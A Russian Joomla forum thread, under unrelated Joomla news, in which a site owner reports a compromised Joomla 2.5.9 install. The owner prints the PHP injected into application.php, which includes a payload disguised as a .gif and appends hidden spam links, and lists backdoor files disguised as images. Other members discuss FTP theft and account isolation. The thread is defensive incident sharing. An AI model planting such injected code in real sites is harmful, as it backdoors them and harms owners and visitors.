Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2911 Просмотров
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Сегодня обнаружил взломанный сайт, в подвале сайта были ссылки написаны в диве размером 10px.

Может кому пригодится, нашел внедрение в фаиле /includes/application.php в 271 сроке
 
Код
		$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
 
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

так же появились файлы в директориях:
/modules/mod_banners/     появились php файлы но расширение jpg стоит на них (base, data, header,highlight,icon,login,symbol,tools)   при открытии редактором в них находится код.

/modules/mod_footer/tmpl   фаил class_calendar.php   тоже с вирусом

фаил появился в корне (забыл как называется, какой-то инклудс пхп)

и один фаил появился в директории /media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img
фаил назывался img.php

дата создания всех файлов 19 января 15 года
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Версия Joomla, количество сайтов на аккаунте хостинга?
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Версия 2.5.9.  сайтов на хосте около 20 где-то.
Были на хосте проблемы с рассылкой спама (тоже были созданы вирусные файлы, сайты находились в одном аккаунте, потом вылечил, разнес по разным аккаунтам),
Пострадали сайты старой версии Joomla, причем одной и той же версии (это не мои проекты были, другой человек все эти сайты заливал), взор упал что на почти всех сайтах был странный плагин фотогалереи, который превью сам собирает в кеш (файлы фото просто загружались в папку на FTP, видимо для более простого управления сайтом)
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь. Не вылечили.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Основная причина заражения - это вирус на ПК, который украл ftp пароль.

Цитировать
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь

Хорошее замечание. Именно так и нужно делать - изоляция юзеров.
« Последнее редактирование: 27.02.2015, 23:21:09 от capricorn »
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
сайтов на хосте около 20 где-то.

Все разнести. Не долечили просто. Да и обновить давно пора. Вряд ли вирус на ПК, но проверить не помешало бы.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
дата создания всех файлов 19 января 15 года
посмотрите логи веб сервера за 19.01.2015. если там ничего нет, то залили по ftp. есть другие варианты?

Цитировать
Пострадали сайты старой версии Joomla
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).


« Последнее редактирование: 27.02.2015, 23:35:41 от capricorn »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).
Боты сейчас с высшим образованием  ;), уж поверьте, а FTP с ПК уже давно (с 2009-2010) не крадут, зачем время тратить когда стоит "псу" команду дать в виде домена, а он сам всю работу сделает.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
а FTP с ПК уже давно (с 2009-2010) не крадут

Еще как крадут. Никогда не видели с MS Security Essentials (легальная Windows 7 Ultimate) - уровень оповещения "критический", а действие "разрешено"? Я как раз в это время покупал жд билет. Для меня это закончилось, к счастью, блокировкой банковской карты. До меня только потом дошло задуматься.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
В скрупулезности ботов можно быть уверенным. Было до 300 логов в минуту на очень большое количество расширений. Бот не устает.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.

как раз в это время и сайт был заражен, именно по ftp.

вот еще интересная история. стоит почитать
http://ktonanovenkogo.ru/web-obzory/kak-proverit-sajt-na-virusy-proverka-onlajn-zarazheniya.html
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Взломали сайт Antonkiil

Автор kristina_r

Ответов: 25
Просмотров: 3170
Последний ответ 24.08.2026, 23:47:57
от Sulpher
Сканируем сайты! Сканер сайта или Shell and Backdoor Script Finder

Автор flyingspook

Ответов: 304
Просмотров: 216538
Последний ответ 29.06.2026, 10:03:01
от PaLyCH
При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 6097
Последний ответ 31.03.2024, 16:14:32
от SeBun
Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 4153
Последний ответ 14.02.2024, 13:15:59
от wishlight
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 304109
Последний ответ 14.09.2022, 14:29:43
от wishlight